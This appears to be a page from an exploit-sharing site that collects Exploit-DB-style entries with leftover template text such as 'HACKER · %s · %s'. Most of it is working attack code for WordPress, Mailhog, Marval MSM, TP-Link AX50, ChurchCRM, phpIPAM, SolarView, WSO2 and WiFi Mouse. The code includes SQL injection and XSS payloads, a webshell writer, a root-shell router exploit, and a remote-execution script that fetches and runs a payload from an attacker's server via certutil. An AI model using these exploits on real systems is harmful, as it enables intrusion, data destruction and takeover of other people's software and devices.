# Exploit Title: WordPress Plugin Weblizar 8.9 - Backdoor # Google Dork: 'wp-json/am-member/license' # Exploit Author: Sobhan Mahmoodi # Vendor Homepage: https://weblizar.com/plugins/school-management/ # Version: 8.9 # Tested on: windows/linux Vulnerable code: add_action( 'rest_api_init', function() { register_rest_route( 'am-member', 'license', array( 'methods' => WP_REST_Server::CREATABLE, 'callback' => function( $request ) { $args = $request->get_params(); if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) { eval( $args['blowf'] ); } }; ) ); } ); If you look at the code, the user code checks the parameters and finally executes the Blowf argument with the eval function. The Eval function is to take a string of PHP commands and execute it. In order to be able to exploit this vulnerability, it is enough to send a request such as the following request that according to the above code, the part with If should be set blowfish and blowf arguments and not empty, and given that eval executes the blowf value , Our favorite command must also be in this argument. Proof of Concept: curl -s -d 'blowfish=1' -d "blowf=system('id');" ' http://localhost:8888/wp-json/am-member/license' uid=33(www-data) gid=33(www-data) groups=33(www-data)
HireHackking

Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Mailhog 1.0.1 - Stored Cross-Site Scripting (XSS) # Google Dork: https://www.shodan.io/search?query=mailhog ( > 3500) # Date: 06.18.2022 # Exploit Author: Vulnz # Vendor Homepage: https://github.com/mailhog/MailHog # Software Link: https://github.com/mailhog/MailHog # Version: 1.0.1 # Tested on: Windows,Linux,Docker # CVE : N/A Explanation: Malicious users have the ability to send API requests to localhost and this request will be executed without any additional checks. As long as CSRF exists and unrestricted API calls as well, XSS could lead any API calls including email deletion, sending, reading or any other call. Steps to reproduce: 1. Create malicious attachment with payloads stated below 2. Attach malicious file to email with payload (XSS) 3. Send email 4. Wait for victim to open email 5. Receive data, get control of victim browser using Beef framework, or manipulate with API data Proof of Concept: <script> var XMLHttpFactories = [ function () { return new XMLHttpRequest() }, function () { return new ActiveXObject("Msxml2.XMLHTTP") }, function () { return new ActiveXObject("Msxml3.XMLHTTP") }, function () { return new ActiveXObject("Microsoft.XMLHTTP") } ]; function createXMLHTTPObject() { var xmlhttp = false; for (var i=0;i<XMLHttpFactories.length;i++) { try { xmlhttp = XMLHttpFactories[i](); } catch (e) { continue; } break; } return xmlhttp; } var xhr = createXMLHTTPObject(); xhr.open("DELETE", "http://localhost:8025/api/v1/messages", true); xhr.onreadystatechange = function() { if (xhr.readyState == 4) alert("Request completed, with the following status code: " + xhr.status); } xhr.send(""); </script>
HireHackking

Kite 1.2021.610.0 - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path # Date: 2020-11-6 # Exploit Author: Ghaleb Al-otaibi # Vendor Homepage: https://www.kite.com/ # Version: Version 4.2.0.1 U1 # Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044 # CVE : NA # Service info: C:\Windows\system32\cmd.exe>sc qc KiteService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: KiteService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KiteService DEPENDENCIES : SERVICE_START_NAME : LocalSystem
HireHackking

Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)

HACKER · %s · %s

# Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF) # Date: 27/5/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.marvalnorthamerica.com/ # Software Link: https://www.marvalnorthamerica.com/ # Version: v14.19.0.12476 # Tested on: Windows # PoCs: https://drive.google.com/drive/folders/1Zy5Oa-maLo0ACfLz90uvxqxwG18DwAZY # 2FA Bypass: <html> <body> <form action="https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptHandler.ashx?method=DisableTwoFactorAuthentication&classPath=%2FMSM_Test%2FRFP%2FForms%2FProfile.aspx&classMode=WXr8G2r3eh3984wn3YQvtybzSUW%2B955Uiq5AACvfimwA%2FNZHYRFm8%2Bgidv5CcNfjtLsElRbK%2FRmwvfE9UfeyD6DseGEe5eZGWB32FOJrhdcEh7oNUSSO9Q%3D%3D" method="POST" enctype="text/plain"> <input type="submit" value="Submit request" /> </form> </body> </html>
HireHackking
# Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated) # Date: 27/5/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.marvalnorthamerica.com/ # Software Link: https://www.marvalnorthamerica.com/ # Version: v14.19.0.12476 # Tested on: Windows # Detailed blog: https://cyber-guy.gitbook.io/cyber-guy/blogs/marval-msm-rce POST /MSM_Test/RFP/Forms/ScriptHandler.ashx?method=ProcessScript&classPath=%2FMSM_Test%2FRFP%2FForms%2FScriptMaintenance.aspx&classMode=WXr8G2r3eh0wvNjbiIT6aYVgZATjWlaZW0UFQrQrcAku4qWefyYTUu%2BzULTTON0fQaLjNtnCW7VX%2Fj1rYPDpKKN%2F8HPLGRSpVbdvPaR4mPIrSr4Aj22VMuIDEkMTpPhoq3gX8p4TBir56GBTJcpLv1agwKPB%2BWI%2F2TlU%2FjQKzz0%3D HTTP/2 Host: MSMHandler.io Cookie: ASP.NET_SessionId=arrsgikvbwbagdsvetfvphbu; appNameAuth=B3D1490922B24585684E139359F3BB93D8D92468A906B1FEA01EB4CF760A23DC90BF30327784677BBC00C5860C145602EF39BB9BEBB6A451E57DBF42C47B7D0CDE09F4CE15D2A5BEBFFCE5A7BFCF7DED8D8B17036F2BCE3DDA873B542EED614B9B42E4B5E4AA18BBE32CC0EB864E6825C898A2F465A42E871DF13F19845E171697D5E23688EAD29D3F6B221DBF18002DE5B929DBA88D42B4B518BC95F5BC5F3A3D36722F User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: application/json, text/javascript, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 456 Origin: https://MSMHandler.io Dnt: 1 Referer: https://MSMHandler.io/MSM_Test/RFP/Forms/ScriptMaintenance.aspx?id=3 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers type=%221%22&content=%22%5Cn%5CnFunction+Pwn()%5Cn++Set+shell+%3D+CreateObject(%5C%22wscript.Shell%5C%22)%5Cn%5Cn%5Cn++++shell.run+%5C%22powershell.exe+-nop+-w+hidden+-E+%5C%22%5C%22JAB2AGEAcgA9AGgAbwBzAHQAbgBhAG0AZQA7AG4AcwBsAG8AbwBrAHUAcAAgAGsAcgBmADUAbAB2AGYANABzAGUAdABtAGoAMgB2AG4AZABiADUAOQBsADQAdgBtAGcAZABtADUAawB0ADkALgAkAHYAYQByAC4AbwBhAHMAdABpAGYAeQAuAGMAbwBtAA%3D%3D%5C%22%5C%22%5C%22%5Cn%5Cn%5CnEnd+Function%5Cn%5CnPwn%22&id=%2226%22&isCi=true
HireHackking
# Exploit Title: HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path # Date: 2022-06-06 # Exploit Author: Ali Alipour # Vendor Homepage: https://support.hp.com/us-en/document/c01998934 # Software Link: https://support.hp.com/us-en/drivers/selfservice/hp-laserjet-pro-m1212nf-multifunction-printer-series/3965847 # Version: 20180815_1 # Tested on: Windows 10 Pro x64 # CVE : N/A # Service info: C:\Users\Wr3ak>sc qc "HPM1210RcvFaxSrvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: HPM1210RcvFaxSrvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\HP\HP LaserJet M1210 MFP Series\ReceiveFaxUtility.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : HP LaserJet Professional M1210 MFP Series Receive Fax Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: The local user able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
HireHackking
# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Tomas Melicher # Technical Details: https://github.com/aaronsvk/CVE-2022-30075 # Date: 2022-06-08 # Vendor Homepage: https://www.tp-link.com/ # Tested On: Tp-Link Archer AX50 # Vulnerability Description: Remote Code Execution via importing malicious config file # CVE: CVE-2022-30075 #!/usr/bin/python3 import argparse # pip install argparse import requests # pip install requests import binascii, base64, os, re, json, sys, time, math, random, hashlib import tarfile, zlib from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome from Crypto.PublicKey import RSA from Crypto.Util.Padding import pad, unpad from Crypto.Random import get_random_bytes from urllib.parse import urlencode class WebClient(object): def __init__(self, target, password): self.target = target self.password = password.encode('utf-8') self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8') self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8') self.stok = '' self.session = requests.Session() data = self.basic_request('/login?form=auth', {'operation':'read'}) if data['success'] != True: print('[!] unsupported router') return self.sign_rsa_n = int(data['data']['key'][0], 16) self.sign_rsa_e = int(data['data']['key'][1], 16) self.seq = data['data']['seq'] data = self.basic_request('/login?form=keys', {'operation':'read'}) self.password_rsa_n = int(data['data']['password'][0], 16) self.password_rsa_e = int(data['data']['password'][1], 16) self.stok = self.login() def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = cipher.decrypt(ciphertext) plaintext = unpad(plaintext_padded, aes_block_size) return plaintext def rsa_encrypt(self, n, e, plaintext): public_key = RSA.construct((n, e)).publickey() encryptor = PKCS1_v1_5.new(public_key) block_size = int(public_key.n.bit_length()/8) - 11 encrypted_text = '' for i in range(0, len(plaintext), block_size): encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex() return encrypted_text def download_request(self, url, post_data): res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True) filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0] if os.path.exists(filepath): print('[!] can\'t download, file "%s" already exists' % filepath) return with open(filepath, 'wb') as f: for chunk in res.iter_content(chunk_size=4096): f.write(chunk) return filepath def basic_request(self, url, post_data, files_data={}): res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data) return json.loads(res.content) def encrypted_request(self, url, post_data): serialized_data = urlencode(post_data) encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8')) encrypted_data = base64.b64encode(encrypted_data) signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data)) encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature) res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important if(res.status_code != 200): print('[!] url "%s" returned unexpected status code'%(url)) return encrypted_data = json.loads(res.content) encrypted_data = base64.b64decode(encrypted_data['data']) data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data) return json.loads(data) def login(self): post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)} data = self.encrypted_request('/login?form=login', post_data) if data['success'] != True: print('[!] login failed') return print('[+] logged in, received token (stok): %s'%(data['data']['stok'])) return data['data']['stok'] class BackupParser(object): def __init__(self, filepath): self.encrypted_path = os.path.abspath(filepath) self.decrypted_path = os.path.splitext(filepath)[0] self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = pad(plaintext, aes_block_size) return cipher.encrypt(plaintext_padded) def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext): cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv) plaintext_padded = cipher.decrypt(ciphertext) plaintext = unpad(plaintext_padded, aes_block_size) return plaintext def encrypt_config(self): if not os.path.isdir(self.decrypted_path): print('[!] invalid directory "%s"'%(self.decrypted_path)) return # encrypt, compress each .xml using zlib and add them to tar archive with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar: for filename in os.listdir(self.decrypted_path): basename,ext = os.path.splitext(filename) if ext == '.xml': xml_path = '%s/%s'%(self.decrypted_path,filename) bin_path = '%s/%s.bin'%(self.decrypted_path,basename) with open(xml_path, 'rb') as f: plaintext = f.read() if len(plaintext) == 0: f = open(bin_path, 'w') f.close() else: compressed = zlib.compress(plaintext) encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) with open(bin_path, 'wb') as f: f.write(encrypted) tar.add(bin_path, os.path.basename(bin_path)) os.unlink(bin_path) # compress tar archive using zlib and encrypt with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2: compressed = zlib.compress(f1.read()+f2.read()) encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed) # write into final config file with open('%s'%(self.encrypted_path), 'wb') as f: f.write(encrypted) os.unlink('%s/data.tar'%(self.decrypted_path)) def decrypt_config(self): if not os.path.isfile(self.encrypted_path): print('[!] invalid file "%s"'%(self.encrypted_path)) return # decrypt and decompress config file with open(self.encrypted_path, 'rb') as f: decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read()) decompressed = zlib.decompress(decrypted) os.mkdir(self.decrypted_path) # store decrypted data into files with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f: f.write(decompressed[0:16]) with open('%s/data.tar'%(self.decrypted_path), 'wb') as f: f.write(decompressed[16:]) # untar second part of decrypted data with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar: tar.extractall(path=self.decrypted_path) # decrypt and decompress each .bin file from tar archive for filename in os.listdir(self.decrypted_path): basename,ext = os.path.splitext(filename) if ext == '.bin': bin_path = '%s/%s'%(self.decrypted_path,filename) xml_path = '%s/%s.xml'%(self.decrypted_path,basename) with open(bin_path, 'rb') as f: ciphertext = f.read() os.unlink(bin_path) if len(ciphertext) == 0: f = open(xml_path, 'w') f.close() continue decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext) decompressed = zlib.decompress(decrypted) with open(xml_path, 'wb') as f: f.write(decompressed) os.unlink('%s/data.tar'%(self.decrypted_path)) def modify_config(self, command): xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path) if not os.path.isfile(xml_path): print('[!] invalid file "%s"'%(xml_path)) return with open(xml_path, 'r') as f: xml_content = f.read() # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script payload = '<service name="exploit">\n' payload += '<enabled>on</enabled>\n' payload += '<update_url>http://127.0.0.1/</update_url>\n' payload += '<domain>x.example.org</domain>\n' payload += '<username>X</username>\n' payload += '<password>X</password>\n' payload += '<ip_source>script</ip_source>\n' payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&')) payload += '<interface>internet</interface>\n' # not worked for other interfaces payload += '<retry_interval>5</retry_interval>\n' payload += '<retry_unit>seconds</retry_unit>\n' payload += '<retry_times>3</retry_times>\n' payload += '<check_interval>12</check_interval>\n' payload += '<check_unit>hours</check_unit>\n' payload += '<force_interval>30</force_interval>\n' payload += '<force_unit>days</force_unit>\n' payload += '</service>\n' if '<service name="exploit">' in xml_content: xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1) else: xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1) with open(xml_path, 'w') as f: f.write(xml_content) arg_parser = argparse.ArgumentParser() arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True) arg_parser.add_argument('-p', metavar='password', required=True) arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config') arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config') arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute') args = arg_parser.parse_args() client = WebClient(args.t, args.p) parser = None if not args.r: print('[*] downloading config file ...') filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'}) if not filepath: sys.exit(-1) print('[*] decrypting config file "%s" ...'%(filepath)) parser = BackupParser(filepath) parser.decrypt_config() print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path)) if not args.b and not args.r: filepath = '%s_modified'%(parser.decrypted_path) os.rename(parser.decrypted_path, filepath) parser.decrypted_path = os.path.abspath(filepath) parser.encrypted_path = '%s.bin'%(filepath) parser.modify_config(args.c) print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path)) if not args.b: if parser is None: parser = BackupParser('%s.bin'%(args.r.rstrip('/'))) print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path)) parser.encrypt_config() data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'}) timeout = data['data']['totaltime'] if data['success'] else 180 print('[*] uploading modified config file "%s"'%(parser.encrypted_path)) data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')}) if not data['success']: print('[!] unexpected response') print(data) sys.exit(-1) print('[+] config file successfully uploaded') print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))
HireHackking

ChurchCRM 4.4.5 - SQLi

HACKER · %s · %s

# Exploit Title: ChurchCRM 4.4.5 - SQLi # Exploit Author: nu11secur1ty # Date: 05.11.2022 # Vendor: https://churchcrm.io/ # Software: https://github.com/ChurchCRM/CRM # Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-31325 ## Description: There is a SQL Injection vulnerability in ChurchCRM 4.4.5 via the 'PersonID' field in /churchcrm/WhyCameEditor.php. [+] Payloads: ```mysql --- Parameter: PersonID (GET) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: PersonID=(SELECT (CASE WHEN (6445=6445) THEN 1 ELSE (SELECT 2844 UNION SELECT 1058) END))&WhyCameID=1&linkBack= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: PersonID=1 AND (SELECT 7116 FROM (SELECT(SLEEP(5)))xUOx)&WhyCameID=1&linkBack= --- ```
HireHackking

phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)

HACKER · %s · %s

# Exploit Title: phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated) # Date: 2022-04-10 # Exploit Author: Guilherme '@behiNdyk1' Alves # Vendor Homepage: https://phpipam.net/ # Software Link: https://github.com/phpipam/phpipam/releases/tag/v1.4.5 # Version: 1.4.5 # Tested on: Linux Ubuntu 20.04.3 LTS #!/usr/bin/env python3 import requests import argparse from sys import exit, argv from termcolor import colored banner = """ █▀█ █░█ █▀█ █ █▀█ ▄▀█ █▀▄▀█ ▄█ ░ █░█ ░ █▀ █▀ █▀█ █░░ █ ▀█▀ █▀█ █▀█ █▀▀ █▀▀ █▀▀ █▀█ █▀▀ █ █▀▀ █▀█ █░▀░█ ░█ ▄ ▀▀█ ▄ ▄█ ▄█ ▀▀█ █▄▄ █ ░█░ █▄█ █▀▄ █▄▄ ██▄ █▄▄ █▄█ █▄▄ █▀▀ █░█ █ █▄░█ █▀▄ █▄█ █▀ █▀▀ █▀▀ █▄█ ░█░ █▄█ ██▄ █▀█ █ █░▀█ █▄▀ ░█░ ▄█ ██▄ █▄▄\n""" print(banner) parser = argparse.ArgumentParser(usage="./exploit.py -url http://domain.tld/ipam_base_url -usr username -pwd password -cmd 'command_to_execute' --path /system/writable/path/to/save/shell", description="phpIPAM 1.4.5 - (Authenticated) SQL Injection to RCE") parser.add_argument("-url", type=str, help="URL to vulnerable IPAM", required=True) parser.add_argument("-usr", type=str, help="Username to log in as", required=True) parser.add_argument("-pwd", type=str, help="User's password", required=True) parser.add_argument("-cmd", type=str, help="Command to execute", default="id") parser.add_argument("--path", type=str, help="Path to writable system folder and accessible via webserver (default: /var/www/html)", default="/var/www/html") parser.add_argument("--shell", type=str, help="Spawn a shell (non-interactive)", nargs="?") args = parser.parse_args() url = args.url username = args.usr password = args.pwd command = args.cmd path = args.path # Validating url if url.endswith("/"): url = url[:-1] if not url.startswith("http://") and not url.startswith("https://"): print(colored("[!] Please specify a valid scheme (http:// or https://) before the domain.", "yellow")) exit() def login(url, username, password): """Takes an username and a password and tries to execute a login (IPAM)""" data = { "ipamusername": username, "ipampassword": password } print(colored(f"[...] Trying to log in as {username}", "blue")) r = requests.post(f"{url}/app/login/login_check.php", data=data) if "Invalid username or password" in r.text: print(colored(f"[-] There's an error when trying to log in using these credentials --> {username}:{password}", "red")) exit() else: print(colored("[+] Login successful!", "green")) return str(r.cookies['phpipam']) auth_cookie = login(url, username, password) def exploit(url, auth_cookie, path, command): print(colored("[...] Exploiting", "blue")) vulnerable_path = "app/admin/routing/edit-bgp-mapping-search.php" data = { "subnet": f"\" Union Select 1,0x201c3c3f7068702073797374656d28245f4745545b2018636d6420195d293b203f3e201d,3,4 INTO OUTFILE '{path}/evil.php' -- -", "bgp_id": "1" } cookies = { "phpipam": auth_cookie } requests.post(f"{url}/{vulnerable_path}", data=data, cookies=cookies) test = requests.get(f"{url}/evil.php") if test.status_code != 200: return print(colored(f"[-] Something went wrong. Maybe the path isn't writable. You can still abuse of the SQL injection vulnerability at {url}/index.php?page=tools&section=routing&subnetId=bgp&sPage=1", "red")) if "--shell" in argv: while True: command = input("Shell> ") r = requests.get(f"{url}/evil.php?cmd={command}") print(r.text) else: print(colored(f"[+] Success! The shell is located at {url}/evil.php. Parameter: cmd", "green")) r = requests.get(f"{url}/evil.php?cmd={command}") print(f"\n\n[+] Output:\n{r.text}") exploit(url, auth_cookie, path, command)
HireHackking

SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS) # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29299 # Tested on: Windows # Proof Of Concept: http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6
HireHackking
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS) # Date: 21 Apr 2022 # Exploit Author: cxosmo # Vendor Homepage: https://wso2.com # Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; # API Microgateway 2.2.0; # Data Analytics Server 3.2.0; # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; # Identity Server Analytics 5.5.0 and 5.6.0; # WSO2 Micro Integrator 1.0.0. # Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82) # CVE: CVE-2022-29548 import argparse import logging import urllib.parse # Global variables VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode=" DEFAULT_PAYLOAD = "alert(document.domain)" # Logging config logging.basicConfig(level=logging.INFO, format="") log = logging.getLogger() def generate_payload(url, custom_payload=False): log.info(f"Generating payload for {url}...") if custom_payload: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//") else: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//") def clean_url_input(url): if url.count("/") > 2: return f"{url.split('/')[0]}//{url.split('/')[2]}" else: return url def check_payload(payload): encoded_characters = ['"', '<', '>'] if any(character in payload for character in encoded_characters): log.info(f"Unsupported character(s) (\", <, >) found in payload.") return False else: return urllib.parse.quote(payload) if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)", required="True", action="store") parser.add_argument("-p", "--payload", help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))", action="store", default=False) args = parser.parse_args() # Clean user target input args.target = clean_url_input(args.target.lower()) # Check for unsupported characters in custom payload; URL-encode as required if args.payload: args.payload = check_payload(args.payload) if args.payload: generate_payload(args.target, args.payload) else: generate_payload(args.target)
HireHackking

WiFi Mouse 1.7.8.5 - Remote Code Execution(v2)

HACKER · %s · %s

# Exploit Title: WiFi Mouse 1.7.8.5 - Remote Code Execution # Date: 25-02-2021 # Author: H4rk3nz0 # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.7.8.5 # Tested on: Windows Enterprise Build 17763 # Python 3 port done by RedHatAugust # Original exploit: https://www.exploit-db.com/exploits/49601 # Tested on: Windows 10 Pro Build 15063 # Desktop Server software used by mobile app has PIN option which does not to prevent command input. # Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAM from time import sleep import sys import string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3] except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main()
HireHackking

IOTransfer 4.0 - Remote Code Execution (RCE)

HACKER · %s · %s

